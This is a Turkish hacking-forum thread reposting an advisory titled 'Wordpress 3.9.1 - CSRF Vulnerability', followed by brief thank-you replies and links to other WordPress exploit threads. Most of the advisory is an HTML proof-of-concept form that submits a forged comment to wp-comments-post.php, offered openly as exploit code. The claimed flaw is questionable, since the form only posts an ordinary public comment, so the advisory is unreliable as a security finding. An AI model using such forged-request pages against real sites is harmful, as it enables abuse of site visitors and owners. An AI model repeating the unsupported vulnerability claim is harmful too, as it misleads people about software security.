Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
Wordpress 3.9.1 - CSRF Vulnerability
#1
Full title :Wordpress 3.9.1 - CSRF Vulnerability
Date add :2014-06-22
Category :web applications
Platform :php



PHP Kod:
# EXPLOIT TITLE:Wordpress 3.9.1-CSRF vulnerability
# DATE:21st June,2014
  
# Author:Avinash Kumar Thapa
  
#URL: localhost/wordpress/
  
#PATCH/FIX:Not fixed yet.
  
###################################################################################################
  
Technical Details:
  
This is the new version released by Wordpress.
  
version is 3.9.1(Latest)
  
##Cross site request Forgery(CSRF) is present in this version at the url shown:http://localhost/wordpress/wp-comments-post.php##
  
#####################################################################################################
  
Exploit Code:
  
<
html>
  
  <!-- 
CSRF PoC generated by **Avinash Kumar Thapa** -->
  
  <
body>
  
    <
form action="http://localhost/wordpress/wp-comments-post.php" method="POST">
  
      <
input type="hidden" name="author" value="Anonymous" />
  
      <
input type="hidden" name="email" value="helloworld@outlook.com" />
  
      <
input type="hidden" name="url" value="www.random.com" />
  
      <
input type="hidden" name="comment" value="Cross site request Forgery(CSRF)" />
  
      <
input type="hidden" name="submit" value="Post Comment" />
  
      <
input type="hidden" name="comment_post_ID" value="1" />
  
      <
input type="hidden" name="comment_parent" value="0" />
  
      <
input type="submit" value="Submit form" />
  
    </
form>
  
  </
body>
  
</
html>
 
###########################################################################################################
----
-- 
Avinash
  
a
.k.a
  
**SPID3R**
 
twitter: @m_avinash143<https://twitter.com/m_avinash143>
 
# 2176756D962A5753   1337day.com [2014-06-23]   3C403FE073E403FD # 
İnsɑnlɑr değişmez değişen tek şey şɑrtlɑr ve çıkɑrlɑr...
Beğenenler:
#2
eline saglik reyiz
Beğenenler:
#3
eline saglik
Beğenenler:
#4
eline sağlık reis
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  WordPress TheAgency Teması Dosya Yükleme Açığı KingSkrupellos 11 182 2 saat önce
Son Yorum: the_zizil
  WordPress TimThumb Dorkları + Cyberizme Özel KingSkrupellos 73 4,375 Dün, Saat: 14:05
Son Yorum: SheelWe
  Wordpress "Js Support Ticket" File Upload Bypass Extensions Mr.F92 16 535 03-12-2016, Saat: 00:10
Son Yorum: Slowycan
  WordPress store theme Upload Acıgı archavin 72 4,771 24-11-2016, Saat: 17:33
Son Yorum: Mrxxx
  WordPress TheCotton Teması Uzaktan Dosya Yükleme Açığı KingSkrupellos 5 73 23-11-2016, Saat: 22:29
Son Yorum: VictoryPeke
Anahtar Kelimeler

Wordpress 3.9.1 - CSRF Vulnerability indir, Wordpress 3.9.1 - CSRF Vulnerability Videosu, Wordpress 3.9.1 - CSRF Vulnerability Online izle, Wordpress 3.9.1 - CSRF Vulnerability Bedava indir, Wordpress 3.9.1 - CSRF Vulnerability Yükle, Wordpress 3.9.1 - CSRF Vulnerability Hakkında, Wordpress 3.9.1 - CSRF Vulnerability Nedir, Wordpress 3.9.1 - CSRF Vulnerability Free indir, Wordpress 3.9.1 - CSRF Vulnerability Oyunu, Wordpress 3.9.1 - CSRF Vulnerability Download


1 Ziyaretçi